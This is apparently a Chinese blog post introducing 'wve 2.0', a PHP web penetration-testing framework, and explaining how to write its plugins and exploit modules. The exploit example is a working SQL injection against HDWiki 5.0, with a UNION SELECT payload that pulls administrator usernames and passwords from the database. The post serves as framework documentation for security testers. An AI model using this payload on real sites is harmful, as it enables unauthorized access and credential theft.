#web vuln exploit payload 2.0 版本
简称wve,是一个以php开发针对web渗透测试的一个框架平台,本版本对于1.0,1.5 之前代码是完全重写,而且更注重与扩展性,便携性,使用sqlite数据库临时储存数据。
框架内置7条命令,用于实现一些基本操作,也支持自定义命令,或者说是插件(扩展)。下面简单说下扩展插件以及exploit模块的编写
注意:文件命名规范 扩展名称(也是命令名称)加上_plus.php
类名与扩展名称相同,扩展最终执行方法名必须命名为run
定义help方法后会现在在内置命令help中显示。
#范例:
\wve\model\plus\test_plus.php
<?php
class test{ //类名与文件名(命令名称)必须相同
public function help(){ //定义help方法 用于显示在内置help命令中
return 'test 帮助信息';
}
public function run(){ //定义run方法 用于插件的运行
msg('test模块执行扩展执行成功');
}
}
?>
测试效果:
wve--> help
|---------------------------------------------------------------------------|
| [ ] help 帮助命令
| [ ] search 搜索命令
| [ ] options 查看设置选项
| [ ] set 设置选项参数
| [ ] join 加载模块
| [ ] run 执行模块
| [ ] show 模块列表
| [ ] Plus:
| [ ] test 帮助信息
|---------------------------------------------------------------------------|
wve--> test
|---------------------------------------------------------------------------|
| [ ] test模块执行扩展执行成功
|---------------------------------------------------------------------------|
wve-->
可以看到内置的帮组命令中已经显示出来了
| [ ] test 帮助信息 这个扩展的命令帮助
test 命令输入后也显示
test模块执行扩展执行成功
说明我们的扩展已经成功调用。
关于exploit模块的编写:
注意类名必须与模块名称相同 必须定义info函数,用于显示模块信息以及模块设置信息。
数组名info 为模块信息 数组名option 为模块执行参数设置信息
下面以hdwiki 5.0版本的在注入漏洞来编写范例
\wve\model\exploit\hdwiki5injection.php
<?php
class hdwiki5injection {
public function info(){ //定义info 方法返回数组信息
$info=array(
'info'=>array( //info 数组定义模块相关信息
'author'=>'admin', //作者信息
'title'=>'测试模块', //模块名称
'info'=>'这是一个测试模块嘿嘿' //模块简介
),
'option'=>array( //模块参数信息设置
'host'=>'127.0.0.1', //host初始化值127.0.0.1
'path'=>'/',
'id'=>'0',
'pre'=>'wiki_',
'port'=>'80'
)
);
return $info;
}
public function run(){ //模块运行函数 msg("HOST => ".G('host'),1); // 使用G函数来或许命令中设置参数的值
$data=HTTP::GET(G('host'),G('path').'/index.php?doc-summary-x%27%20and%201=3%20UNION%20SELECT%201,2,3,4,5,concat%280x7776657E,username,0x3D,password,0x277E%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20'.G('pre').'user%20where%20groupid=4%20limit%20'.G('id').',1%23'); if(strpos($data,'wve~')!== false){ preg_match('/wve~(.*)\'~/', $data, $arr); $result=explode("=",$arr[1]); msg('Exploit Success',1); msg('username:'.$result[0],1) msg('password:'.$result[1],1); }else{ msg ('Exploit Failed',1); }
}
}
?>
注:wve并非工具而是框架平台
该框架版权所有 90 Security Team
框架只能用于安全人员进行授权的安全检测,请勿用于非法活动
wve 2.0框架现全部由落叶完成,希望大家也能参与到该框架的开发当中,项目地址:https://geakit.com/Security_Team/wve ,源码、程序已全部放出。
虽然落叶投入了很多精力在wve的开发中,但是难免个人能力和精力有限,wve还有很多不完善之处。
框架的开发包括:
1.功能完善
2.性能优化
3.插件开发
4.插件移植
5.框架测试
希望有能力和精力的人能加入wve的完善之中,尤其是插件的开发和移植之中,也希望大家能多多提供一些好的php插件源码,方便开发人员进行移植,当然直接移植成wve插件更好
项目地址: https://geakit.com/Security_Team/wve
评论区: